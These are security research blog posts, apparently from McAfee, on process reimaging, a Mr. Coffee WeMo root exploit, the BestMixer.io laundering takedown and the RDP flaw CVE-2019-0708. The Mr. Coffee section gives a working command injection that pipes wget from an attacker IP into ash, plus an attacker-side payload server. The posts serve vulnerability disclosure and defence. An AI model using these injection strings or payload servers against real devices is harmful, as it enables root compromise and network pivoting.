    2. Consolidate the duplicate APIs being exposed from NtQueryInformationProcess to provide easier management and guidance to consumers that require retrieving process filename information. For example, clearly state that GetMappedFileName should only be used for DLLs and not for the EXE backing a process.
    3. Differentiate in API description whether the API is only limited to retrieving the filename and path at process creation or real-time at time of request.
  3. Filepath Locking
    1. Lock the filepath and name while a process is executing, similar to how file modification is locked, to prevent tampering.
    2. At a minimum, a standard user should not be able to rename the binary path of an executing process.
  4. Reuse of existing FILE_OBJECT with LoadLibrary API (Prevent Process Reimaging)
    1. LoadLibrary should verify that any existing FILE_OBJECT it reuses has the most up-to-date filepath at load time.
  5. A short-term mitigation is for Defender to at least flag that it found malicious process activity but could not find the associated malicious file on disk (right now it fails open, providing no notification of potential threats found in memory or on disk).
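
To make the K32GetProcessImageFileName versus K32GetModuleFileNameEx distinction concrete, the following is a minimal, Windows-only sketch that queries both APIs for a given PID. It illustrates the kind of cross-check an analyst can run, not production detection logic; after a filepath-style reimaging the two views of the process image can disagree:

  # Illustrative sketch (Windows only): compare two views of a process's image path.
  # K32GetProcessImageFileNameW returns an NT device path (\Device\HarddiskVolumeX\...),
  # K32GetModuleFileNameExW returns a Win32 path, so only the file name component
  # is compared here.
  import ctypes, ntpath, sys
  from ctypes import wintypes

  PROCESS_QUERY_INFORMATION = 0x0400
  PROCESS_VM_READ = 0x0010

  k32 = ctypes.windll.kernel32
  k32.OpenProcess.restype = wintypes.HANDLE

  def image_paths(pid):
      h = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
      if not h:
          raise OSError("OpenProcess failed for pid %d" % pid)
      try:
          nt_buf = ctypes.create_unicode_buffer(1024)
          win_buf = ctypes.create_unicode_buffer(1024)
          k32.K32GetProcessImageFileNameW(h, nt_buf, 1024)
          k32.K32GetModuleFileNameExW(h, None, win_buf, 1024)
          return nt_buf.value, win_buf.value
      finally:
          k32.CloseHandle(h)

  if __name__ == "__main__":
      nt_path, win32_path = image_paths(int(sys.argv[1]))
      print("K32GetProcessImageFileName:", nt_path)
      print("K32GetModuleFileNameEx:    ", win32_path)
      if ntpath.basename(nt_path).lower() != ntpath.basename(win32_path).lower():
          print("File name mismatch - the process may have been reimaged")
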
Mitigation recommended to Endpoint Security Vendors

The FILE_OBJECT ID must be tracked from FileCreate, because the process has closed its handle to the file by the time the image is loaded at ImageLoad.

This ID must be managed by the Endpoint Security Vendor so that it can be leveraged to determine if a process has been reimaged when performing process attribute verification.
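
As a purely illustrative sketch of that bookkeeping (the event names and identifiers here are hypothetical; a real implementation would live in a kernel-mode component of the ESS, not in Python):

  # Hypothetical sketch of the record-keeping an ESS needs: remember the path
  # bound to a FILE_OBJECT at FileCreate, then compare it with the path reported
  # at ImageLoad. Event shapes and names are invented for illustration only.
  file_object_paths = {}  # FILE_OBJECT id -> path recorded at FileCreate

  def on_file_create(file_object_id, path):
      # File-create callback: record the original binding.
      file_object_paths[file_object_id] = path

  def on_image_load(file_object_id, reported_path):
      # Image-load callback: the process may already have closed its handle,
      # so the FileCreate-time record is the source of truth.
      original = file_object_paths.get(file_object_id)
      if original is not None and original != reported_path:
          return "possible process reimaging: %s -> %s" % (original, reported_path)
      return None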

The post In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass appeared first on McAfee Blogs.

Mr. Coffee with WeMo: Double Roast

McAfee Advanced Threat Research recently released a blog detailing a vulnerability in the Mr. Coffee Coffee Maker with WeMo. Please refer to the earlier blog to catch up with the processes and techniques I used to investigate and ultimately compromise this smart coffee maker. While researching the device, there was always one attack vector that I had wanted to revisit. It was during the writing of that blog that I was finally able to circle back to it. As it turns out, my intuition was accurate; the second vulnerability I found was much simpler and still allowed me to gain root access to the target.

Recapping the original vulnerability

The first vulnerability modified the “template” section of the brew schedule rule file, which is a unique file sent when the user schedules a brew in advance. I also needed to modify the template itself, which is sent from the WeMo app directly to the coffee maker. During that research I noticed that many of the other fields could be impactful, but I did not investigate them as thoroughly as the template field.

Figure 1: Brew schedule rule

When the user schedules a brew, an individual rule is added to the Mr. Coffee root crontab. The crontab entry uses the rule’s “id” field to make sure the correct rule is executed at the desired time.

Figure 2: Root crontab entry

Crontab provides basic scheduling features at the OS level. The user provides both the command to execute and the timing details, down to the minute, as shown in Figure 3.

Figure 3: Crontab syntax
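
For reference, a generic crontab entry has the shape “minute hour day-of-month month day-of-week command”. The snippet below composes an entry of the same shape as the one the scheduler writes; the rule id and schedule here are hypothetical, and the real entry is the one shown in Figure 2:

  # Illustrative only: build a crontab line in the generic field order
  # (minute hour day-of-month month day-of-week command).
  rule_id = "example-rule-id"                                # hypothetical rule id
  minute, hour, dom, month, dow = "30", "7", "*", "*", "1"   # Mondays at 07:30
  entry = f"{minute} {hour} {dom} {month} {dow} /sbin/rtng_run_rule {rule_id}"
  print(entry)   # -> 30 7 * * 1 /sbin/rtng_run_rule example-rule-id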

During the initial research, I started to fuzz the rule “id” field; however, because every rule name that I placed in the malicious schedule was always prefixed with “/sbin/rtng_run_rule”, I could not get anything abnormal to happen. I also noticed that many characters that could be useful for command injection were being filtered.

The following is a list of characters sanitized or filtered on input.

At this point I moved on and ended up finding the template vulnerability as laid out in the previous blog.

Finding an even simpler vulnerability

A few months after disclosing to Belkin, I revisited the steps required for the template abuse, in preparation for a public disclosure blog. Having the ability to write arbitrary code directly into root’s crontab is enticing, so I began looking into it again. I needed to find a way to terminate the “rtng_run_rule” command and add my own commands to the crontab file by modifying the “id” field. The “rtng_run_rule” file is a shell script that directly calls a Lua script named “rtng_run_rule.lua”. I noticed that I could send the double pipe “||” characters, but the “rtng_run_rule” wrapper script would never return a failing return code. Next, I looked at how the wrapper script handles command line arguments, as shown below.

Figure 4: rtng_run_rule wrapper script

At this point I created a new rule: “-f|| touch test”. The “-f” is not a parsed argument, meaning it falls through to the “Bad option” case, causing the “rtng_run_rule” wrapper script to return “-1”. With the wrapper script returning a failing return code, the “||” (or) statement is triggered, which executes “touch test” and creates an empty file named “test”. Since I still had serial access (my previous blog explains in detail how I achieved this), I was able to log in to the coffee maker and find where the “test” file was located. I found it in root’s home directory.

Being able to write arbitrary files and execute commands without the “/” character is still somewhat limiting, as most file paths and web URLs need forward slashes. I needed a way to execute commands that contained “/” characters. I decided to do this by downloading a file from a webserver I control and executing it in Ash, bypassing the filepath character sanitization.

Figure 5: Commands allowing for execution of filtered characters.

Let me break this down. The “-f”, as indicated before, causes the wrapper script to fail, so the “||” branch executes. The “wget” command then initiates a download from my web server, located at IP address “172.16.127.31”. The “-q” flag silences wget’s own status output, and “-O -” tells wget to write what it downloads to STDOUT instead of a file. Finally, “| ash” pipes that output into the Ash shell, which executes it as Linux shell commands.

This way I can set up a server that simply returns a file containing the necessary Linux commands and host it on my local machine. When I send the rule with the above command injection, the coffee maker reaches out to my server and executes everything as root. Piping wget into Ash also bypasses all the character filtering, so I can now execute any command I want.
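
The attacker side of this is simple to stand up. The sketch below is an approximation for illustration: the injected rule “id” is reconstructed from the breakdown above (the exact string is the one shown in Figure 5), and the payload contents are placeholders, not the commands I actually ran:

  # Rough attacker-side sketch (illustrative). Serves a shell payload as the
  # root document so that "wget -q -O - <attacker-ip> | ash" on the coffee maker
  # downloads and executes it. Binding port 80 may require elevated privileges.
  import http.server, socketserver

  PAYLOAD = b"#!/bin/sh\n# placeholder: commands to run as root on the device\nid > /tmp/pwned\n"

  class PayloadHandler(http.server.BaseHTTPRequestHandler):
      def do_GET(self):
          self.send_response(200)
          self.send_header("Content-Length", str(len(PAYLOAD)))
          self.end_headers()
          self.wfile.write(PAYLOAD)

  # Approximate shape of the injected rule "id": "-f" forces rtng_run_rule to
  # fail, "||" then runs the download-and-execute pipeline; fetching the bare IP
  # avoids the filtered "/" character in the injected string itself.
  INJECTED_RULE_ID = "-f|| wget -q -O - 172.16.127.31 | ash"

  if __name__ == "__main__":
      with socketserver.TCPServer(("0.0.0.0", 80), PayloadHandler) as srv:
          srv.serve_forever()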

Status with Vendor

Belkin did patch the original template vulnerability and released new firmware. The vulnerability explained in this blog was found on the new firmware and, as of today, we have not heard of any plans for a patch. This vulnerability was disclosed to Belkin on February 25th, 2019. In accordance with our vulnerability disclosure policy, we are releasing details of this flaw today in hopes of alerting consumers of the device to the ongoing security findings. While this bug is also within the Mr. Coffee with WeMo’s scheduling function, it is much easier for an attacker to leverage since it does not require any modifications to templates or rehashing of code changes. The following demo video shows how this vulnerability can be used to compromise other devices on the network, including a fully patched Windows 10 PC.

Key takeaways for enterprises, consumers and vendors

Devices such as the Mr. Coffee Coffee Maker with WeMo serve as a good reminder of the pros and cons of “smart” IoT. While advances in automation and technology offer exciting new capabilities, they should be weighed against the potential security concerns. In a home setting, consumers should set up these types of devices on a segmented network, isolated from sensitive network traffic and more critical devices. They should implement a strong password policy to make network access more challenging and apply patches or updates for all networked devices whenever available.

Enterprises should restrict access to devices such as these in corporate environments or, at a minimum, provide a policy for their oversight and management. They should be treated just the same as any other asset on the network, as IoT devices are often unmonitored pivot points into more critical network infrastructure. Network scanning and vulnerability assessments should be performed, in conjunction with a rigorous patching cycle for known issues. While the vendor has not provided a CVE for this vulnerability, we calculated a CVSS score of 9.1 out of 10, which categorizes it as a critical vulnerability.

Finally, as consumers of these products, we need to ask more of the vendors and manufacturers. A better understanding of secure coding and vulnerability assessment is critical before products go to market. Vendors who implement a vulnerability reporting program and respond quickly can gain consumers’ trust and ensure product reputation is undamaged. One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. Through analysis and responsible disclosure, we aim to guide product manufacturers toward a more comprehensive security posture.

The post Mr. Coffee with WeMo: Double Roast appeared first on McAfee Blogs.

Cryptocurrency Laundering Service, BestMixer.io, Taken Down by Law Enforcement

A much overlooked but essential part of financially motivated (cyber)crime is making sure that the origins of criminal funds are obfuscated or made to appear legitimate, a process known as money laundering. “Cleaning” money in this way allows the criminal to spend their loot with less chance of being caught. In the physical world, for instance, criminals move large sums of cash into offshore accounts and create shell companies to obfuscate the origins of their funds. In the cyber underground, where Bitcoin is the equivalent of cash, it works a bit differently. Because Bitcoin has an open ledger on which every transaction is recorded, obfuscating funds is a bit more challenging.

When a victim pays a criminal after being extorted with ransomware, the ransom transaction in Bitcoin and all subsequent transactions can be tracked through the open ledger. This makes following the money a powerful investigative technique, but criminals have come up with an inventive method to make tracking more difficult: a mixing service.

A mixing service cuts up a sum of Bitcoin into hundreds of smaller transactions, mixes in transactions from other sources for obfuscation, and pays out the input amount, minus a fee, to a designated output address. Mixing Bitcoin that was obtained legally is not a crime but, other than the mathematical exercise, there is no real benefit to it.
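
Purely to illustrate the fragmentation principle (this is not any particular service’s algorithm), the splitting step can be thought of like this:

  # Conceptual illustration only: split an input amount into many randomized
  # sub-amounts and deduct a fee. Real mixers additionally interleave coins from
  # many unrelated customers, which is what actually obscures the on-chain link.
  import random

  def split_amount(total_btc, fee_rate=0.02, parts=200):
      payout = total_btc * (1 - fee_rate)
      weights = [random.random() for _ in range(parts)]
      scale = payout / sum(weights)
      return [round(w * scale, 8) for w in weights]

  chunks = split_amount(0.45)
  print(len(chunks), "outputs totalling ~", round(sum(chunks), 8), "BTC")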

The legality changes when a mixing service advertises itself as a successful method to evade anti-money-laundering policies through anonymity. That is actively offering a money laundering service.

Bestmixer.io

Last year, advertisements for a new mixing service called Bestmixer.io appeared on several cryptocurrency-related websites.

Judging by the article, it sounded like a service that could be considered money laundering or could aid tax evasion.

Bestmixer’s frontpage

Nature of the service

Bestmixer offered a very clear page on why someone should mix their cryptocurrency. On this page Bestmixer described the current anti-money laundering policies and how its service could help evade these policies by making funds anonymous and untraceable. Offering such a service is considered illegal in many countries.

Bestmixer’s explanation page, “why someone should mix bitcoins”.

A closer inspection of the Bestmixer site revealed that its website was hosted in the Netherlands. McAfee ATR notified the Financial Advanced Cyber Team (FACT) of the Dutch anti-fraud agency (FIOD) of Bestmixer.io’s location. FACT is a team that specializes in investigating the financial component of (cyber)crime. A yearlong international investigation led to the takedown of Bestmixer’s infrastructure today.

The post Cryptocurrency Laundering Service, BestMixer.io, Taken Down by Law Enforcement appeared first on McAfee Blogs.

RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708

During Microsoft’s May Patch Tuesday cycle, a security advisory was released for a vulnerability in the Remote Desktop Protocol (RDP). What was unique in this particular patch cycle was that Microsoft produced a fix for Windows XP and several other operating systems, which have not been supported for security updates in years. So why the urgency and what made Microsoft decide that this was a high risk and critical patch?

According to the advisory, the issue discovered was serious enough that it led to remote code execution and was wormable, meaning it could spread automatically on unprotected systems. The bulletin referenced the well-known network worm WannaCry, which heavily exploited a related vulnerability just a couple of months after Microsoft released MS17-010 as a patch in March 2017. McAfee Advanced Threat Research has been analyzing this latest bug to help prevent a similar scenario, and we are urging those with unpatched and affected systems to apply the patch for CVE-2019-0708 as soon as possible. It is extremely likely that malicious actors have weaponized this bug, and exploitation attempts will likely be observed in the wild in the very near future.

Vulnerable Operating Systems:

  • Windows 2003
  • Windows XP
  • Windows 7
  • Windows Server 2008
  • Windows Server 2008 R2

Worms are viruses which primarily replicate on networks. A worm will typically execute itself automatically on a remote machine without any extra help from a user. If a virus’ primary attack vector is via the network, then it should be classified as a worm.

The Remote Desktop Protocol (RDP) enables a connection between a client and an endpoint, defining the data communicated between them in virtual channels. Virtual channels are bidirectional data pipes which enable the extension of RDP. Windows Server 2000 defined 32 Static Virtual Channels (SVCs) with RDP 5.1; due to limitations on the number of channels, Dynamic Virtual Channels (DVCs) were later defined and are contained within a dedicated SVC. SVCs are created at the start of a session and remain until session termination, unlike DVCs, which are created and torn down on demand.

It is this 32-SVC binding which the CVE-2019-0708 patch fixes within the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions in the RDP driver termdd.sys. As can be seen in Figure 1, in the RDP connection sequence connections are initiated and channels are set up prior to Security Commencement, which enables CVE-2019-0708 to be wormable, since an exploit can self-propagate over the network once it discovers open port 3389.


Figure 1: RDP Protocol Sequence

The vulnerability is due to the “MS_T120” SVC name being bound as a reference channel to the number 31 during the GCC Conference Initialization sequence of the RDP protocol. This channel name is used internally by Microsoft and there are no apparent legitimate use cases for a client to request connection over an SVC named “MS_T120.”

Figure 2 shows legitimate channel requests during the GCC Conference Initialization sequence with no MS_T120 channel.

Figure 2: Standard GCC Conference Initialization Sequence

However, during GCC Conference Initialization, the client supplies the channel name, which is not whitelisted by the server, meaning an attacker can set up another SVC named “MS_T120” on a channel other than 31. It is the use of MS_T120 on a channel other than 31 that leads to heap memory corruption and remote code execution (RCE).

Figure 3 shows an abnormal channel request during the GCC Conference Initialization sequence, with the “MS_T120” channel bound to channel number 4.


Figure 3: Abnormal/Suspicious GCC Conference Initialization Sequence – MS_T120 on nonstandard channel
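
To give a sense of what network-level detection can key on, the simplified sketch below walks the channelDefArray of a client’s TS_UD_CS_NET block (part of the GCC Conference Create Request) and flags any request for the “MS_T120” name; as noted above, there is no apparent legitimate reason for a client to ask for that channel. Locating the TS_UD_CS_NET block inside the MCS Connect Initial PDU is assumed to have been done already, and real traffic inspection is considerably more involved:

  # Simplified sketch: flag client requests for the internal "MS_T120" channel.
  # TS_UD_CS_NET layout: 4-byte header (type/length), 4-byte channelCount, then
  # channelCount CHANNEL_DEF entries of 12 bytes (8-byte name + 4-byte options).
  import struct

  def suspicious_channels(cs_net_data: bytes):
      (channel_count,) = struct.unpack_from("<I", cs_net_data, 4)
      findings = []
      for idx in range(channel_count):
          off = 8 + idx * 12
          name = cs_net_data[off:off + 8].split(b"\x00", 1)[0].decode("ascii", "replace")
          if name.upper() == "MS_T120":
              findings.append((idx, name))   # any client request for MS_T120 is suspicious
      return findings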

The components involved in the MS_T120 channel management are highlighted in figure 4. The MS_T120 reference channel is created in the rdpwsx.dll and the heap pool allocated in rdpwp.sys. The heap corruption happens in termdd.sys when the MS_T120 reference channel is processed within the context of a channel index other than 31.

Figure 4: Windows Kernel and User Components

The Microsoft patch, as shown in Figure 5, now adds a check for a client connection request using the channel name “MS_T120” and ensures it binds to channel 31 only (1Fh) in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions within termdd.sys.


Figure 5: Microsoft Patch Adding Channel Binding Check

After we investigated the patch applied to both Windows 2003 and XP and understood how the RDP protocol was parsed before and after the patch, we decided to test and create a Proof-of-Concept (PoC) that would use the vulnerability to remotely execute code on a victim’s machine and launch the calculator application, a well-known litmus test for remote code execution.

Figure 6: Screenshot of our PoC executing

For our setup, RDP was running on the target machine, and we confirmed the unpatched versions were running on the test setup. The result of our exploit can be viewed in the following video:

There is a gray area to responsible disclosure. With our investigation we can confirm that the exploit works and that it is possible to remotely execute code on a vulnerable system without authentication. Network Level Authentication should be effective at stopping this exploit if enabled; however, if an attacker has valid credentials, they can bypass this step.

As a patch is available, we decided not to provide earlier in-depth detail about the exploit or publicly release a proof of concept. That would, in our opinion, not be responsible and may further the interests of malicious adversaries.

Recommendations:

  • We can confirm that a patched system will stop the exploit and highly recommend patching as soon as possible.
  • Disable RDP from outside of your network and limit it internally; disable it entirely if not needed. The exploit is not successful when RDP is disabled.
  • Client requests with “MS_T120” on any channel other than 31 during the GCC Conference Initialization sequence of the RDP protocol should be blocked unless there is evidence of a legitimate use case.


It is also important to note that the RDP default port can be changed via a registry value, and after a reboot the service will be tied to the newly specified port. From a detection standpoint this is highly relevant.

Figure 7: RDP default port can be modified in the registry

Malware or administrators inside a corporation can change this with admin rights (or with a program that bypasses UAC) and write the new port to the registry; if the system is not patched, the vulnerability will still be exploitable over the non-standard port.
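
The configured port lives under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp in the PortNumber value. A quick, illustrative way to check what a given Windows host is actually set to listen on:

  # Windows-only, illustrative check of the configured RDP listening port.
  import winreg

  KEY = r"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

  with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY) as key:
      port, _ = winreg.QueryValueEx(key, "PortNumber")

  print("RDP is configured to listen on TCP port", port)
  if port != 3389:
      print("Non-default RDP port - adjust detection and blocking rules accordingly")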

McAfee Customers:

McAfee NSP customers are protected via the following signature released on 5/21/2019:

0x47900c00 “RDP: Microsoft Remote Desktop MS_T120 Channel Bind Attempt”

If you have any questions, please contact McAfee Technical Support.


The post RDP Stands for “Really DO Patch!” – Understanding the Wormable RDP Vulnerability CVE-2019-0708 appeared first on McAfee Blogs.